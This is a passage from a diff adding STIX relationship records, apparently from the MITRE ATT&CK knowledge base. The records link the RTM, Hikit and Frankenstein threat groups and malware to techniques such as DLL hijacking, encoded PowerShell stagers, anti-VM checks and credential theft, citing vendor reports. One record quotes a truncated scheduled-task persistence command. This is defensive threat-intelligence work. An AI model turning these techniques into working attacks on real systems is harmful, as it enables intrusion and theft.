+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "(Citation: Talos Frankenstein June 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--42c0ba63-03d8-414d-8f42-2aa4c585ea03",
+ "type": "relationship",
+ "modified": "2020-05-11T15:21:09.608Z",
+ "created": "2020-05-11T15:21:09.608Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "ESET Buhtrap and Buran April 2019",
+ "url": "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "description": "ESET Research. (2019, April 30). Buhtrap backdoor and Buran ransomware distributed via major advertising platform. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network Yandex.Direct.(Citation: ESET RTM Feb 2017)(Citation: ESET Buhtrap and Buran April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--03e67769-31da-4a46-a5a6-1ccbdd0cf29f",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:17.037Z",
+ "created": "2020-05-11T16:57:30.447Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has used spearphishing attachments to distribute its malware.(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5f1493e8-65d8-474a-b6b7-c1311fc24d98",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.363Z",
+ "created": "2020-05-11T17:27:36.637Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has used Registry run keys to establish persistence for the [RTM](https://attack.mitre.org/software/S0148) Trojan and other tools, such as a modified version of TeamViewer remote desktop software.(Citation: ESET RTM Feb 2017)(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--09381138-b93b-4b0d-b82d-c21d452ff514",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.406Z",
+ "created": "2020-05-11T17:51:01.565Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "FireEye HIKIT Rootkit Part 2",
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020."
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) has the ability to create a remote shell and run given commands. (Citation: FireEye HIKIT Rootkit Part 2)",
+ "relationship_type": "uses",
+ "id": "relationship--667c86bd-54f8-4602-a94a-054195de2808",
+ "type": "relationship",
+ "modified": "2020-05-13T20:36:49.361Z",
+ "created": "2020-05-11T18:05:53.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
+ "source_name": "FireEye Hikit Rootkit"
+ },
+ {
+ "source_name": "FireEye HIKIT Rootkit Part 2",
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020."
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) is a [Rootkit](https://attack.mitre.org/techniques/T1014) that has been used by [Axiom](https://attack.mitre.org/groups/G0001).(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2) ",
+ "relationship_type": "uses",
+ "id": "relationship--aacb43b8-2d3a-40bc-9f7b-1acb5b2474f2",
+ "type": "relationship",
+ "modified": "2020-05-13T20:37:30.032Z",
+ "created": "2020-05-11T18:05:53.457Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "FireEye HIKIT Rootkit Part 2",
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020."
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2)",
+ "relationship_type": "uses",
+ "id": "relationship--8eac6ff8-7c47-4a81-94ad-e5844d2533f1",
+ "type": "relationship",
+ "modified": "2020-05-13T20:36:49.359Z",
+ "created": "2020-05-11T18:05:53.488Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
+ "source_name": "FireEye Hikit Rootkit"
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) has used [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001) to load oci.dll as a persistence mechanism.(Citation: FireEye Hikit Rootkit)",
+ "relationship_type": "uses",
+ "id": "relationship--1ad315e2-1693-427a-9a04-a613bd0e2f22",
+ "type": "relationship",
+ "modified": "2020-05-13T20:37:30.053Z",
+ "created": "2020-05-11T18:05:53.513Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "external_references": [
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has used a modified version of TeamViewer and Remote Utilities for remote access.(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--685a8409-db59-4ef3-b4de-786b87be8839",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.412Z",
+ "created": "2020-05-11T18:14:38.220Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "external_references": [
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has used search order hijacking to force TeamViewer to load a malicious DLL.(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--16dfd169-264f-410f-97bf-a1cdec20c50e",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.409Z",
+ "created": "2020-05-11T18:14:38.240Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) used Port 44443 for its VNC module.(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--b2848d62-76a1-465c-b12e-7dc3113e6bbe",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:17.034Z",
+ "created": "2020-05-11T18:33:34.341Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has the capability to download a VNC module from command and control (C2).(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--14e8774f-a443-4065-b44d-5bb13b467c7c",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:17.179Z",
+ "created": "2020-05-11T18:33:34.506Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has attempted to lure victims into opening e-mail attachments to execute malicious code.(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1bf08293-5342-4736-b3a9-c1f160ad9c81",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.415Z",
+ "created": "2020-05-11T18:36:05.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used PowerShell to run a series of base64-encoded commands, that acted as a stager and enumerated hosts.(Citation: Talos Frankenstein June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--4e8e5997-1af2-4d33-b9d0-e193acbd691f",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.624Z",
+ "created": "2020-05-11T19:28:48.985Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has run a command script to set up persistence as a scheduled task named \"WinUpdate\", as well as other encoded commands from the command-line.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a0a54af7-b2b2-4914-a987-b8646f94db58",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.619Z",
+ "created": "2020-05-11T19:28:48.995Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used trojanized Microsoft Word documents sent via email, which prompted the victim to enable macros.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--25892875-54af-463b-abd4-33ea4141982e",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.627Z",
+ "created": "2020-05-11T19:28:48.998Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used CVE-2017-11882 to execute code on the victim's machine.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--01e457f1-0fc5-473b-950c-82a2fd2a79a9",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.616Z",
+ "created": "2020-05-11T19:28:49.002Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has established persistence through a scheduled task using the command: /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR , named \"WinUpdate\".(Citation: Talos Frankenstein June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--eb9ccd35-7ddc-4340-acb7-788e109d0e59",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.554Z",
+ "created": "2020-05-11T19:28:48.976Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used trojanized documents that retrieve remote templates from an adversary-controlled website.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--658fac5c-df6e-4586-9850-5a7512e0d164",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.603Z",
+ "created": "2020-05-11T19:28:48.989Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used Word documents that prompts the victim to enable macros and run a Visual Basic script.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7638d7f9-ad02-4ca5-9212-d85b1f33b5f4",
+ "type": "relationship",
+ "modified": "2020-05-12T17:23:38.942Z",
+ "created": "2020-05-11T19:28:49.277Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has run encoded commands from the command line.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--75f107f3-cc95-449c-883b-590089f23913",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.617Z",
+ "created": "2020-05-11T19:44:34.960Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used MSbuild to execute an actor-created file.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--cd469152-553f-4219-985c-b0689e27cc7e",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.607Z",
+ "created": "2020-05-11T19:44:35.028Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used WMI queries to check if various security applications were running, as well as the operating system version.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1c8e6547-4754-427e-b8da-6b1560c68381",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.700Z",
+ "created": "2020-05-11T19:44:35.038Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used WMI queries to check if various security applications were running, including VMWare and Virtualbox.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--31bdbd30-4938-48d6-ba95-1b90af01041c",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.605Z",
+ "created": "2020-05-11T19:44:35.090Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used WMI queries to detect if virtualization environments or analysis tools were running on the system.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f5410e8d-a440-41a6-abcc-d7b1c4c097db",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.610Z",
+ "created": "2020-05-11T19:44:35.156Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has harvested credentials from the victim's machine using [Empire](https://attack.mitre.org/software/S0363).(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--39ebd556-6b3a-4129-bc43-406e07a5206d",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.628Z",
+ "created": "2020-05-11T21:30:27.754Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts, looking for the public IP address of the system.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--baa3063b-13b9-4a32-adac-7c0cc40704c5",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.697Z",
+ "created": "2020-05-11T21:30:27.775Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
